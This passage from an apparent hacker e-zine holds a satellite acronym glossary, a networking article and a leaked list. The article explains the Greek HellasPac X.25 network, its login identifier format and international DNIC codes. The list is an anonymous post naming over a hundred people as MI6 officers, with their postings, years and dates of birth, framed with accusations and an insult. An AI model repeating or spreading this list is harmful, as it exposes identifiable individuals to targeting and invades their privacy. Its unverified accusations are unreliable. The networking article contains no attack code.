Processor BER Bit Error Rate BFN Beam Forming Network Bps Bits Per Second BPSK Binary Phase-Shift Keying CDMA Code Division Multiple Access CML Current Mode Logic CMDS Commands CMOS Complementary Metal Oxide Semiconductor CR&T Command Ranging & Telemetry DAMA Demand Assigned Multiple Access DARPA Defense Advance Research Projects Agency dB Decibel D/C Down converter DCU Digital Control Unit ECL Emitter Controlled Logic FDM Frequency Division Multiplexing FDMA Frequency Division Multiple Access FEC Forward Error Correction FET Field Effect Transistor Gbps Gigabits Per Second GHz Gigahertz HDR High Date Rate HEMT High Electron Mobile Transistor IBOW In Bound Order Wire IF Intermediate Frequency Kbps Kilobits Per Second LSI Large Scale Integration ms millisecond MBA Multiple Beam Antenna Mbps Megabits Per Second MCS Master Control Station MOSAIC Motorola Oxide Self-Aligned Implanted Circuit MSM Microwave Switch Matrix MSPS Mega Symbols Per Second NASA National Aeronautics & Space Administration NMT Network Management Terminal ns Nanosecond OBOW Out Bound Order Wire OC Optical Carrier QPSK Quaternary Phase Shift Keying RCSA Receive Coax Switch Assembly RF Radio Frequency SMSK Serial Minimum Shift Keying SNMP Simple Network Management Protocol SONET Synchronous Optical Network SQPSK Staggered Quaternary Phase Shift Keying SSI Small Scale Integration TCSA Transmit Coax Switch Assembly TDM Time Division Multiplexing TDMA Time Division Multiple Access TEW Tracking Error Word TLM Telemetry TT&C Telemetry, Tracking & Command TWTA Traveling Wave Tube Amplifier U/C Up converter VSAT Very Small Aperture Terminal WIRS Waveguide Input Redundancy Switch WORS Waveguide Output Redundancy Switch written by lowtek ----> lowtek@deadprotocol.org ----------------- This file was written mostly with public information the signals are upon us... and i am here to feed them -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Mi5 list ]:::::::::::::[OO--[ by anon ]---[ xxx@anon.isp.ee ]:::::: -->[OO]:::::::::::::::::::::::::::::::[ http://somwhere.com ]:::::::::::::::: From: anxxxxxx@anon.isp.ee Reply To: anxxxxxx@anon.isp.ee Subject:none This message is sent by someone who prefers to remain anonymous To reply to her/him use following address: anxxxxxx@anon.isp.ee In case of spam or any other type of abuse please inform us http://anon.isp.ee/feedback/ Service provided by http://www.isp.ee --------------- The attached list identifies the unprincipled and unscrupulous individuals involved with MI6 worldwide. The list was produced by an honest man who has since left MI6 because he felt that the behaviour of that organisation was unacceptable in a civilised society. They are accountable to nobody for their law breaking activities. They are subordinated to the elite people of this country, for example the Royal household and the establishment. The whole world should be aware of these individuals and their capabilities. British citizens need to know that these people are supported by those ruling this country. This "Al Capone" style organisation has removed the human rights of ordinary people, not only in this country but worldwide. Names Dudley Charles Ankerson: 78 Buenos Aires, 85 Mexico, 93 Madrid; dob 1948; Dr. Raymond Benedict Barthol Asquith: 83 Moscow, 92 Kiev; dob 1952; Viscount. Kerry Charles Bagshaw: 82 Geneva, 88 Moscow; dob 1943; OBE. Ian Clive Barnard: 94 Geneva; dob 1965. Richard Martin Donne Barrett: 83 Ankara, 88 New York, 97 Amman; dob 1949. James Lloyd Baxendale: 94 Cairo (MECAS), 97 Amman; dob 1967. Jonathan Beales. Peter John William Black: 74 MECAS, 77 Kuwait, 80 Amman, 87 Dhaka; dob 1946. Jamie Blount. Rupert Bowen: 90 Windhoek, 92 Tirana. Andrew Jonathan Corrie Boyd: 81 Accra, 88 Mexico City, 96 Islamabad; dob 1950 Andrew James Brear: 94 Santiago; dob 1960. Christopher Mark Breeze: 88 Nicosia, 94 New Delhi; dob 1963. Alastair Breeze. Richard Philip Bridge: 86 Warsaw, 88 Moscow; dob 1959. Stuart Armitage Brooks: 72 Rio, 75 Lisbon, 79 Moscow, 87 Stockholm, 93 Moscow; dob 1948; OBE. Christopher Parker Burrows: 82 East Berlin, 87 Bonn, 93 Athens; dob 1958. George Benedict Joseph P Busby: 89 Bonn, 92 Belgrade; dob 1960; OBE. Geoff Chittenden. Robert John Paul Church: 76 Bankok, 81 Berlin, 86 Nairobi, 89 Bangkok, 97 Nairobi; dob 1947. Timothy Clayden: 91 Warsaw, 95 Lagos; dob 1960; Wanker. Martin Hugh Clements: 86 Tehran, 90 Vienna; dob 1961. John Donovan Nelson Clibborn: 66 Nicosia, 72 Bonn, 72 Brussels, 88 Washington; dob 1941; CMG. Peter Salmon Collecot: 80 Khartoum, 82 Canberra, 93 Jakarta; dob 1950. Andrew David Cordery: 75 Nairobi, 77 New York, 84 Lusaka, 88 Berlin, 95 Oslo; dob 1947. Sherard Louis Cowper-Coles: 80 Cairo, 87 Washington; dob 1955; CMG, LVO. Keith Craig: dob 1961. John Martin Jamie Darke: 88 Cairo, 96 Dubai; dob 1953. Michael Hayward Davenport: 89 Warsaw, 96 Moscow; dob 1961. Peter Brian Davies: 83 Rome, 88 Peking, 96 Jakarta; dob 1954, Richard Billing Dearlove: 68 Nairobi, 73 Prague, 80 Paris, 87 Geneva, 91 Washington; dob 1945; OBE. John Deerlove. Keith Derek Evetts: 75 Warsaw, 77 Maputo, 83 New York, 86 Kingston, 88 Lisbon; dob 1948; OBE. Michael Edward Joseph Feliks: 93 Peking; dob 1964; Dr. Robert Dominic Russell Fenn: 85 Hague, 88 Lagos, 92 New York; dob 1962. Nicholas Bernard Frank Fishwick: 88 Lagos, 94 Istanbul; dob 1958; Dr. Richard George Hopper Fletcher: 68 Athens, 69 Nicosia, 73 Bucharest, 85 Athens; dob 1944; CMG. Richard Andrew Foulsham: 84 Brunei, 86 Lagos, 95 Rome; dob 1950. Rosalind Mary Elizabeth Fowler: 90 Hong Kong; dob 1965. Michael Roger Fox: 93 Geneva; dob 1958. Richard Ogilby Leslie Fraser-Darling: 73 Helsinki, 84 Washington; dob 1949. Robert Andrew Fulton: 69 Saigon, 73 Rome, 78 Berlin, 84 Oslo, 89 New York; dob 1944. Kevin Andrew Garvey: 81 Bangkok, 85 Hanoi, 92 Phnom Penh; dob 1960. John Henry Cary Gerson: 69 Hong Kong, 71 Singapore, 74 Peking, 87 Hong Kong; dob 1945. Andrew Patrick Somerset Gibbs: 79 Rio, 84 Moscow, 87 Pretoria; dob 1951; OBE. Sean Goodman. Anita Goodman. Jacqueline Goodman. Keith Rutherford Gosling: 75 Singapore, 78 Vienna, 86 Manila, 93 Tel Aviv; dob 1944; OBE. Roger Patrick Hamilton: 78 Jakarta, 82 Tokyo, 84 Hong Kong, 89 Copenhagen; dob 1948. Roger John Hargreaves: 73 Hong Kong, 76 Sanaa, 85 Hong Kong, 96 Wellington; dob 1950. Samuel Andrew Roland Hatfield: 95 Lagos; dob 1963. Steven John Hill: 88 Vienna, 96 New York; dob 1962. Katherine Sarah-Julia Horner: 85 Moscow, 97 Moscow; dob 1952. Thomas Rober Benedict Hurd: 95 Warsaw; dob 1964. Robert Mitchell Forest Kelly: 74 Nairobi, 80 Turkey, 81 Ankara, 95 Ottowa; dob 1946. Theodore Maurice Kenwrick-Pierc: 74 Brussels, 82 Nicosia, 88 Hague, 94 Athens; dob 1948. Alex Kershaw: 97 Geneva; dob 1967. Nicholas John Andrew Langman: 86 Montevideo, 88 New York, 94 Paris; dob 1960. Edmund John Scott Latter: 94 Istanbul; dob 1968. Jeremy John Legge: 87 Lusaka, 94 Vienna; dob 1961. Gareth Geoffrey Lungley: dob 1971. Christine Anne MacQueen: 84 Brasilia, 89 New York, 90 Paris; dob 1959. Norman James MacSween: 72 Nairobi, 77 Tehran, 83 Bonn, 91 Stockholm, 95 Moscow; dob 1948. Iain Arthur Gray Matthewson: 81 New York, 85 Warsaw, 93 Prague; dob 1952. Ian Forbes McCredie: 76f Lusaka, 79 Tehran, 83 Copenhagen, 92 New York; dob 1950; OBE. Patrick Joseph McGuinness: 88 Sanaa, 94 Abu Dhabi, 96 Cairo; dob 1963; OBE. Justin James McKenzie Smit: 96 Moscow; dob 1969. William John Clovis Meath-Baker: 88 Kabul, 89 Prague, 97 Istanbul; dob 1959. Andrew Jonathan Mitchell: 93 Bonn; dob 1967. Anthony Leopold Colyer Monckton: 90 Geneva, 96 Zagreb; dob 1960. Richard Peter Moore: 90 Ankara, 91 Istanbul, 95 Islamabad; dob 1963. Mark Scott Thomas Morgan: 84 Geneva, 88 Aden, 94 Valletta; dob 1958; MBE. Stuart Richard Morley: 89 San Jose, 90 Bridgetown, 96 Hague; dob 1959. Clive Dare Newell: 79 Tehran, 82 Kabul, 86 Addis, 90 Bosnia, 94 Ankara; dob 1953. Peter James Norris: 85 Lagos, 90 Guatemala; dob 1955, Dr. Peter David Orwin: 77 Athens, 84 Brasilia, 89 Tel Aviv, 96 Hague; dob 1944; OBE, MC. Christopher Robert Geoffrey Pagett: 78 Havana, 79 Lusaka, 88 Maputo, 97 New York; dob 1952; OBE. Colin Douglas Partridge: 80 Delhi, 87 Hanoi, 94 Hong Kong; dob 1955. Martin Eric Penton-Voak: 95 Moscow; dob 1965. Geoffrey Colin Perry: 81 Hong Kong, 92 Geneva; dob 1951. Alan Petty. Richard William Potter: 85 Riyadh, 88 Nicosia; dob 1960. Mark Precious: Buenos Aires 86; dob 1960. John Andrew Raine: 88 Kuwait, 94 Damascus, 97 Riyadh; dob 1962. Michael Charles Ramscar: 77 Lagos, 79 Brasilia, 86 Madrid, 89 San Jose, 97 Madrid; dob 1948. Timothy Simeon Rawlinson: 91 Lagos, 96 Stockholm; dob 1962. Richard Robert Reeve: 73 Singapore, 77 Hong Kong, 83 Hong Kong; dob 1948. Michael John Regan: 86 Kabul, 89 Dubai, 95 Bangkok; dob 1955. Peter Marius Julian Prows Reilly: 96 Khartoum; dob 1971. John Ridd. Janet Elizabeth Rogan: 91 Peking, 98 Sarajevo; dob 1962. John McLeod Scarlett: 73 Nairobi, 76 Moscow, 84 Paris, 91 Moscow; dob 1948; OBE. Deborah Jane Soothill: 96 Peking; dob 1969. Richard David Spearman: 92 Istanbul, 97 Paris; dob 1960. David Spedding. Guy David St. John Kelso Spindler: 87 Moscow, 97 Pretoria; dob 1962. Andrew Jeremy Stafford: 77 Stockholm, 79 Accra, 84 Prague, 91 Brussels; dob 1953. Christopher David Steele: 90 Moscow; dob 1964. Geoffrey Tantum. Anthony Jonathan Terry: 70 Nairobi, 73 Havana, 79 Belgrade, 86 Santiago, 97 Geneva; dob 1946. Richard Paul Reynier Thompson: 91 Stockholm, 96 Geneva; dob 1960. Michael Thomson. Daniel Vernon Thornton: 95 Brussels; dob 1969. Stuart Graham Turvill: 95 Islamabad; dob 1971. John Venning. Richard Vlaistow: 95 Havana. James Spencer Kennedy Watson: 91 Kuwait, 97 Damascus; dob 1964. Andrew Whiteside: 95 Budapest; dob 1968. Mark Williams: 95 Tehran. Kenneth Mark Williams: 76 Kuala Lumpur, 79 Bridgetown, 88 Harare, 94 Delhi; dob 1944. Simon Jules Wilson: 91 Athens, 93 Zagreb; dob 1966; OBE. Julian Paul Geoffrey Wiseman: 78 Geneva, 84 Dhaka, 90 Islamabad; dob 1944. David John Woods: 78 Vienna, 81 Bucharest, 92 Harare, 97 Pretoria; dob 1951. Ian Alexander Woods: 77 New York, 84 Berlin, 86 Bonn, 95 Warsaw; dob 1951. Alexander William Younger: 95 Vienna; dob 1963. ----------------- [ hmm ] -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ HELLASPAC ]::::::::::::[OO--[ by monty ]---[ ]:::::::::::::::::::: -->[OO]:::::::::::::::::::::::::::::::[ ]::::::::::::::::::::::::::::::::::: Introduction: ~~~~~~~~~~~~~~~ Well here I am, back again. I've started writing a series of articles about telephone systems and anything that is worth playing with. First I 'd like you to think if you have anything worth publishing. If you do then write an article and publish it, if you don't then find a subject and write about it. All i mean is that you should gather the information that you have and publish them. You never know who will you help. Maybe you have information that are useless for you but helpfull for guys in other countries. Well by saying this i don't mean that you should all start writting about programming ess etc..etc..etc.. Hmm.. I was thinking of something newer. You may not have any knowledge on new systems tho you can get a book and sam the infoz that it has in a phile. Most of the philes that will be published are information that i have collected from books, from the net and from my telco. You should do the same. Some General zhiTz: ~~~~~~~~~~~~~~~~~~~~~ HellasPac is an independant network which has it's own subscribers plus it has it's own network-bones. It's main disadvantage is that it uses the PSTN or leased lines (0 - 3 KHz) to communicate so it is kinda slow. The Hellaspac as all the networks has its own centers (terminals) that communicate with the subscriber and with the other centers(bones). The communication between the centers is independed from the data rate of each terminal. This is done with packet roaming. Each terminal "cuts" the packets that it wants to send in a pre-defined size. Then the terminal counts the packets and puts in every packet the number of the receiver and then send them in the center with its own speed. The center receives each packet, it "saves" it in its memory and then it sends it in the another center-receiver with the speed that the centers have. At the end to center-receiver "saves" the packet and sends it to the final receiver (your computer) with the speed that you have. Thus the terminals have different speeds in the network. Hellaspac Centers ~~~~~~~~~~~~~~~~~~~ Hellaspac is connected to the PSDN (Packet Switched Public Data Network) of other countries, and of course their subscribers. In Greece there are 8 centers (in Athens, Pireus, Heraklio, Tripoli, Patra, Lamia, Thessaloniki and Kabala). Each center covers an area so that the network could cover all Greek towns. Connections with Hellaspac: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There are 2 different ways to connect with Hellaspac. 1) A permanent connection between your computer and the Hellaspac's terminal (you can call and be called) 2) A connection between your computer and the Hellaspac's terminal (you can only call) Hellaspac accepts two kinds of terminals, asynchronous (packet terminals) and synchronous (character terminals). Synchronous terminals are computers or "smart" terminals that are able to "cut" the data packet they want to send. This is done under the X.25 recommendation of the CCIT. That's why the asynchronous terminals are also called X.25 terminals. The connection between a synchronous terminal ends in the PAD which is explained in the next paragraph. Now about the communication between the synchronous terminals and the PAD is described in the X.29 rerommendation of the CCIT. The asynchronous terminals are usually simple terminals or the type of start-stop terminals. These terminals can't cut the data packets. The connection between an asynchronous terminal ends up in a special assembling - disassembling packet structure at the center. These structures are called Hellaspac PAD (Packet Assembler - Disassembler). The asynchronous terminal connection in the PAD is being described by X.28 recommendation of the CCIT and the convenience of the PAD in the terminal is described by the X.3 of the CCIT. Now the connection of the PAD with the synchronous terminal. The communication of the asynchronous terminals through the packet network is known as the triple X communication (X.3 - X.28 - X.29). A little ascii (excuse ma lame ascii art) scheme right above: |~~~~~~~~~~~~~~~~| | Asynchronous | | Terminal | |________________| | | |X.28 | | | |~~~~~~~| |~~~~~~~~| | PAD |___X.29________| Center | |_______| |________| | | | | | | |X.29 |X.25 | | |~~~~~~~~| | | Center |-----X.25----------|~~~~~~~~~~~~~| |________| | Synchronous | | Terminal | |_____________| Of course the subscriber's computer will connect with its modem to the modem of the center.. Well if that isn't obvious for you then you better stop reading this phile. Damn now that i thought of it again, let me say some things about the modem. You all know what it is, the modem transforms the multi-outline of the terminal in a 2-lined or 4-lined exit under V.24 recommendation of the CCITT also known as RS-232C. Of course the speed of the line depends of the speed of the modem (bit per second). Numbering in Hellaspac of the perm terminals: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Methods, datagram and virtual circuits) For national calls the number of a permanent connected subscriber has this format: 2ABCDEFGH wherever A,B,C,D,E,F,G,H are digits from 0 to 9. Greece's DNIC (Datapack International Identification Code) is 202. So if you want to call a perm connected subscriber in Greece from another country you should connect to the number 2022ABCDEFGH. Now a list with DNIC numbers will follow. I haven't checked the whole list so if anyone finds something that doesn't work please send me a mail. Service - DATAPAC INTERNATIONAL IDENTIFICATION CODES (DNIC) COUNTRY NETWORK DNIC DIRECTION ------- ------- ---- --------- ALGERIA DZPAC 6030 BI-DIR ANGOLA EPTEL 6315 BI-DIR ANDORRA ANDORPAC 2945 BI-DIR ANTIGUA AGANET 3443 INCOMING ARGENTINA ARPAC 7220 BI-DIR TELINTAR 7221 BI-DIR ARPAC 7222 BI-DIR EASYGATE 7223 BI-DIR COMPUSERVER 7224 BI-DIR ARMENIA ARMEM AUSTRIA DATEX-P 2322 BI-DIR DATEX-P TTX 2323 BI-DIR RADAUS 2329 BI-DIR AUSTRALIA AUSTPAC 5052 BI-DIR OTC DATA ACCESS 5053 BI-DIR AUSTPAC 5054 BI-DIR AUSTPAC 5057 BI-DIR AZORES TELEPAC 2680 BI-DIR BAHAMAS BATELCO 3640 BI-DIR BAHRAIN BAHNET 4263 BI-DIR BARBADOS CARIBNET 3422 BI-DIR IDAS 3423 BI-DIR BELARUS BELPAK 2570 BI-DIR BELGIUM DCS 2062 BI-DIR DCS-TELEX 2068 BI-DIR DCS-PSTN 2069 BI-DIR BELIZE BTLDATAPAC 7020 BI-DIR BENIN BENINPAC 6162 BI-DIR BERMUDA BERMUDANET 3503 BI-DIR BRAZIL INTERDATA 7240 BI-DIR RENPAC 7241 BI-DIR RENPAC 7248 INCOMING RENPAC 7249 INCOMING TELERJ 7242 BI-DIR MINASDATA 7243 BI-DIR TELESC 7244 BI-DIR BRAZILIAN 7246 BI-DIR DATASAT BL 7247 BI-DIR TELESP 7251 BI-DIR TELESJ&TEREST 7252 BI-DIR TELEMIG 7253 BI-DIR TELEPAR 7254 BI-DIR CRT 7255 BI-DIR WEST&MIDWEST 7256 BI-DIR TELEBAHIA 7257 BI-DIR NORTHEST 7258 BI-DIR NORTHERN 7259 BI-DIR BULGARIA BULPAC 2841 BI-DIR BURKINA FASO BURKIPAC 6132 BI-DIR CAMEROON CAMPAC 6242 BI-DIR CAYMAN ISLANDS IDAS 3463 BI-DIR CHAD CHADPAC 6222 BI-DIR CHILE ENTEL 7302 BI-DIR CHILE-PAC 7303 BI-DIR VTRNET 7305 BI-DIR CHINA PTELCOM 4600 BI-DIR CHINAPAK 4602 BI-DIR CHINAPAK 4603 BI-DIR COLOMBIA COLDAPAQ 7320 BI-DIR COLDAPAQ 7322 BI-DIR COSTA RICA RACSAPAC 7120 BI-DIR RACSAPAC 7122 BI-DIR RACSAPAC 7128 BI-DIR RACSAPAC 7129 BI-DIR CROATIA CROAPAK 2191 BI-DIR CUBA CUBA 2329 BI-DIR CUBANET 3682 BI-DIR CURACAO DATANET-1 3621 BI-DIR CYPRUS CYTAPAC 2802 BI-DIR CYTAPAC 2807 BI-DIR CYTAPAC 2808 BI-DIR CYTAPAC 2809 BI-DIR DENMARK DATAPAK 2382 BI-DIR DATAPAK 2383 BI-DIR DJIBOUTI STIPAC 6382 BI-DIR DOMINICAN REP. UDTS-I 3701 INCOMING EGYPT ARENTO 6020 BI-DIR ESTONIA ESTPAC 2480 BI-DIR FIJI FINTEL 5420 BI-DIR FIJINET 5421 BI-DIR FINLAND DATAPAK 2441 BI-DIR DATAPAK 2442 BI-DIR DATAPAK 9358 BI-DIR DIGIPAK 2443 BI-DIR FRANCE TRANSPAC 2080 BI-DIR NTI 2081 BI-DIR TRANSPAC 2089 BI-DIR TRANSPAC 9330 INCOMING TRANSPAC 9331 INCOMING TRANSPAC 9332 INCOMING TRANSPAC 9333 INCOMING TRANSPAC 9334 INCOMING TRANSPAC 9335 INCOMING TRANSPAC 9336 INCOMING TRANSPAC 9337 INCOMING TRANSPAC 9338 INCOMING TRANSPAC 9339 INCOMING FR ANTILLIES TRANSPAC 2080 BI-DIR FR GUIANA TRANSPAC 2080 BI-DIR FR POLYNESIA TOMPAC 5470 BI-DIR GABON GABONPAC 6280 BI-DIR GABOBPAC 6282 BI-DIR GERMANY F.R. ISDN/X.25 2621 BI-DIR DATEX-P 2624 BI-DIR DATEX-C 2627 BI-DIR DATEX 2648 BI-DIR PSN 2652 BI-DIR TNET 2654 BI-DIR GREECE HELLASPAC 2023 BI-DIR GREENLAND KANUPAX 2901 BI-DIR GUAM LSDS 5350 BI-DIR LSDS 5351 BI-DIR GUATEMALA MAYAPAQ 7042 BI-DIR GUATEL 7043 INCOMING HAWAII HAWAIITEL 3152 BI-DIR HONDURAS HONDUTEL 7080 INCOMING HONDUTEL 7089 BI-DIR HONG KONG HUTCHISON 4541 BI-DIR INTELPAK 4542 BI-DIR NEW T&T 4543 BI-DIR DATAPAK 4545 BI-DIR HUTCHPAK 4546 BI-DIR NEW WORLD 4547 BI-DIR HUNGARY DATEX-P 2160 BI-DIR DATEX-P 2161 BI-DIR ICELAND ICEPAK 2740 BI-DIR INDIA GPSS 4042 BI-DIR RABMN 4041 BI-DIR I-NET 4043 BI-DIR I-NET 4049 BI-DIR INDONESIA SKDP 5101 BI-DIR IRAN IRANPAC 4321 BI-DIR IRELAND EIRPAC 2721 BI-DIR EIRPAC 2724 BI-DIR POSTNET 2728 BI-DIR ISRAEL ISRANET 4251 BI-DIR ITALY DARDO 2222 BI-DIR ITACABLE 2226 BI-DIR ITAPAC 2227 BI-DIR IVORY COAST SYTRANPAC 6122 BI-DIR JAMAICA JAMINTEL 3380 INCOMING JAPAN GLOBALNET 4400 BI-DIR DDX 4401 BI-DIR JENSNET-P 4403 BI-DIR NIS-NET 4406 BI-DIR VENUS-P 4408 BI-DIR VENUS-P 9955 INCOMIMG VENUS-C 4409 BI-DIR NI+CI 4410 BI-DIR KENYA KENPAC 6390 BI-DIR KOREA REP HINET-P 4500 BI-DIR DACOM-NET 4501 BI-DIR KUWAIT BAHNET 4263 BI-DIR LATVIA LATTELECOM 2471 BI-DIR LEBANON LEBONPAC 4150 BI-DIR SODETEL 4155 BI-DIR LIECHTENSTEIN TELEPAC 2284 BI-DIR TELEPAC 2289 BI-DIR LUXEMBOURG LUXPAC 2704 BI-DIR LUXPAC 2709 BI-DIR TELETEX 2705 BI-DIR TELETEX 2707 BI-DIR TELETEX 2708 BI-DIR MACAU MACAUPAC 4550 BI-DIR MADAGASCAR INFOPAC 6460 BI-DIR MADEIRA TELEPAC 2680 BI-DIR MALAYSIA MAYPAC 5021 BI-DIR MALDIVES DATANET 4720 BI-DIR MALI MALIPAC 6102 BI-DIR MALTA TELEMALTA 2782 BI-DIR MAURITIUS MAURIDATA 6170 BI-DIR MEXICO TELEPAC 3340 BI-DIR TELNORPAC 3345 BI-DIR TYMPAQ 3346 BI-DIR SERV.DE INFRAES 3347 BI-DIR INTERSYS 3348 BI-DIR INTELCOM 3349 BI-DIR MOROCCO MOROCCO 6040 BI-DIR MOROCCO 6041 BI-DIR MAGHRIPAC 6042 BI-DIR MOROCCO 6049 BI-DIR MOZAMBIQUE TELEDATA 6435 BI-DIR NAMIBIA SWANET 6490 BI-DIR NEPAL NEPPACK 4290 BI-DIR NETHERLAND ANTILLE DATANET 3621 BI-DIR NETHERLANDS DATANET-1 2040 BI-DIR DATANET-1 2041 BI-DIR DABAS 2044 BI-DIR DATANET-1 2049 BI-DIR TRIONET 2057 BI-DIR N. MARIANAS PACNET 5351 BI-DIR NEW CALEDONIA TOMPAC 5460 BI-DIR NEW ZEALAND PACNET 5301 BI-DIR NICARAGUA NICAPAC 7100 BI-DIR NIGER NIGERPAC 6142 BI-DIR NORWAY DATAPAC TTX 2421 BI-DIR DATAPAK 2422 BI-DIR FDPAK 2431 BI-DIR PAKISTAN PAKNET 4100 BI-DIR PAKNET 2352 BI-DIR PANAMA INTELPAQ 7141 BI-DIR INTELPAQ 7142 BI-DIR PAPUA-NEW GUINEA PANGPAC 5053 BI-DIR PARAGUAY ANTELPAC 7447 BI-DIR PERU DICOTEL 7160 BI-DIR PHILIPPINES CAPWIRE 5151 BI-DIR PGC 5152 BI-DIR GLOBENET 5154 BI-DIR ETPI 5156 BI-DIR ETPI 5157 BI-DIR POLAND POLPAK 2601 BI-DIR POLPAK 2602 BI-DIR PKONET 2605 BI-DIR TELBANK-P 2603 BI-DIR PORTUGAL TELEPAC 2680 BI-DIR SABD 2682 BI-DIR PUERTO RICO UDTS 3300 BI-DIR UDTS 3301 BI-DIR QATAR DOHPAC 4271 BI-DIR REUNION (FR) TRANSPAC 2080 BI-DIR RUSSIA RUSPAC 2500 BI-DIR INFOTEL 2503 BI-DIR INFOTEL 2504 BI-DIR RWANDA RWANDA 6352 BI-DIR SAN MARINO X-NET 2922 BI-DIR SAUDI ARABIA ALWASEED 4201 BI-DIR SENEGAL SENPAC 6081 BI-DIR SEYCHELLES INFOLINK 6331 BI-DIR SINGAPORE TELEPAC 5252 BI-DIR TELEPAC 5257 BI-DIR SLOVENIA SIPAX 2931 BI-DIR SIPAX.X25 2932 BI-DIR SOLOMON ISLANDS DATANET 5400 BI-DIR TELEPAC 5401 BI-DIR SLOVENIA SIPAX 2931 BI-DIR SIPAX.X25 2932 BI-DIR SOLOMON ISLANDS DATANET 5400 BI-DIR TELEPAC 5401 BI-DIR SOUTH AFRICA SAPONET 6550 BI-DIR SAPONET 6551 BI-DIR SAPONET 6559 BI-DIR SPAIN TIDA 2141 BI-DIR IBERPAC 2145 BI-DIR SRI-LANKA DATANET 4132 BI-DIR SWEDEN DATAPAK TTX 2401 BI-DIR DATAPAK-2 2403 BI-DIR TELENORDIA 2405 BI-DIR DATAPAK-2 2407 BI-DIR DATAPAK-2 2044 BI-DIR DATAPAK-2 2046 BI-DIR SWITZERLAND TELEPAC 2284 BI-DIR TELEPAC 2285 BI-DIR TELEPAC 2289 BI-DIR TAIWAN PACNET 4873 BI-DIR UDAS 4876 BI-DIR UDAS 4877 BI-DIR TCHECOSLOVAKA EURO-PRAHA 2301 BI-DIR THAILAND THAIPAC 5200 BI-DIR THAIPAC II 5202 BI-DIR IDAR 5201 BI-DIR TONGA DATAPAK 5390 BI-DIR TOGOLESE REP. TOGOPAC 6152 BI-DIR TORTOLA IDAS 3483 INCOMING TRINIDAD DATANETT 3745 BI-DIR TEXTET 3740 BI-DIR TUNISIA RED25 6050 BI-DIR TURKEY TURPAC 2862 BI-DIR TURPAC 2863 BI-DIR TURKS&CAICOS IDAS 3763 INCOMING U ARAB EMIRATES EMDAN 4241 BI-DIR EMDAN 4243 BI-DIR TEDAS 4310 INCOMING UKRAINE UKRPAC 2550 BI-DIR URUGUAY URUPAC 7482 BI-DIR URUPAC 7489 BI-DIR USSR IASNET 2502 BI-DIR U.S. VIRGIN I UDTS 3320 BI-DIR U. KINGDOM IPSS-BTI 2341 BI-DIR PSS-BT 2342 BI-DIR GNS-BT-UK 2343 BI-DIR GNS-BT-EUR 2344 BI-DIR MERCURY 2350 BI-DIR MERCURY 2351 BI-DIR HULL 2352 BI-DIR VANUATU VIAPAC 5410 BI-DIR VENEZUELA VENEXPAQ 7342 BI-DIR YUGOSLAVIA YUGOPAC 2201 BI-DIR ZIMBABWE ZIMNET 6484 BI-DIR For terminals of phone center subscriber (PBX, second lines etc..) 2 more digits will be added. For example the number 2ABCDEFGH will be 2ABCDEFGHxx or 2022ABCDEFGHxx. The subscribers that are not permanent connected to Hellaspac are calling the number 1161 (national 4 digits number) in order to connect. Then they give their identification number. And a lil' ascii schematic: |~~~~~~~~~~| |Subscriber| |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| |Your home | | |~~~~~~| | | computer | | |Center| | |__________| | |______| | | | | | | | | | ___|___ The telephone network | _______ ___|_ |~~~~~~| | |Modem|-------------------------|--|Modem|-----|PAD|----|Center| | ~~~~~~~ (PSTN) | ~~~~~~~ ~~~|~ |______| | | | | | | | | |~~~~~~| | | |Center| | | |______| | | HELLASPAC | |___________________________________| This identification is called NUI (Network User Identification). The NUI's Format is something like this XXXXXXXXBBBBB....B where XXXXXXXX is the 8 digit national number and the BBBB...B is the secret alphanumeric code which the subscriber has (uniqe for each subscriber). The secret code consists from as many characters as you want (consists from n characters top). These networks choose 2 different ways to handle the data. In the next ascii scheme i'll show and describe these ways. (1st way) -------|~~~~~~~~~~~|--|A|--|B|-|C|-----|~~~~~~~~~~|-------- | | | | | | | | -------| Center |------|D|--|E|-----| Center |-------- | (Bone) | | (Bone) | | | | | -------|___________|-----|F|-----------|__________|-------- With the circuit switched links the data flow for each communication in different "streets". The data are being send in different rates. The connection has two choices. Either to stay as it is between the senders or get re-establish and terminated for each data send. (2nd way) ------\ \ |~~~~~~| |~~~~~~| --------\_____|Center|__|A|__|B|__|C|_|D|__|E|_|F|___|Center| / |(Bone)| |(Bone)| -------/ |______| |______| With the packet switched link a connection isn't a real connection! The data is carried in packets. Each packet conteins the receivers address and each packet is "saved" and redirected in the network bones. Though in the terminals the user assumes that there is a connection. The advantage of this method is that each link is used for many "connections" and that 2 users can have different speeds. There are two methods for packet swithcing, one is Datagram and the other are the virtual circuit. These methods differe for their way of handling the data of the address of the receiver and from the way that they redirect the packets in the receiver through the network bones. The Datagram method: ~~~~~~~~~~~~~~~~~~~~~~ With datagram each packet is send with the full receiver's address and with increased number. This address is being anylized in each bone. Thus the packets can travel from different "streets" in order to get to the receiver. So the receiver will get the packets but they might be in a different order from the order that the sender sent them. The Virtual Circuit method: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In this method in order for a terminal to connect to another it has first to send a packet (call request packet). This packet includes the number of the terminal that is calling and the number of the terminal that is called. So the call request packet establishes a "logic" circuit through the network to the receiver. In each link of every bone the connection is characterized by a number of "logic" channel. This number is used as an address for the packets that will follow. With this method the Subscriber A can have two connections. As shown in the scheme the subsriber A is connected to B and C in the same time. |~~~~~~~~~~~~~~~~~~~~~~~| | | |~~~~~~~~~~| | |~~|--|-|4|-----|Subscriber| | |--|5|--|K2| | | C | |~~~~~~~~~~~| | | |__| | ~~~~~~~~~~~~ |Subscriber | | |~~| | | | A |-|1|---|2|---|--|1|-|K1| |7| | ~~~~~~~~~~~~~ | |__| | | | | |~~| | |~~~~~~~~~~| | |--|7|--|K3|--|-|3|----|Subscriber| | |__| | | B | | Hellaspac | ~~~~~~~~~~~~ |_______________________| For the connection from the A to C we have from A to K1 the logic channel 1. From K1 to K2 the logic channel 5, from K2 to C the logic channel 4. From K1 to K3 the logic channel 7 from K3 to B the logic channel 3 and last from K2 to K3 the logic channel 7. As we can se in the same link we can have more than one logic channels. Each bone with the call request packet knows where to redirect the packets that it accepts. These packets though are "saved" in each bone and are getting in an order so that they could leave from the outline. Closin' ~~~~~~~~~ Well that was it. Hope you enjoy it, as always I'll close up with greetings on channels #9x 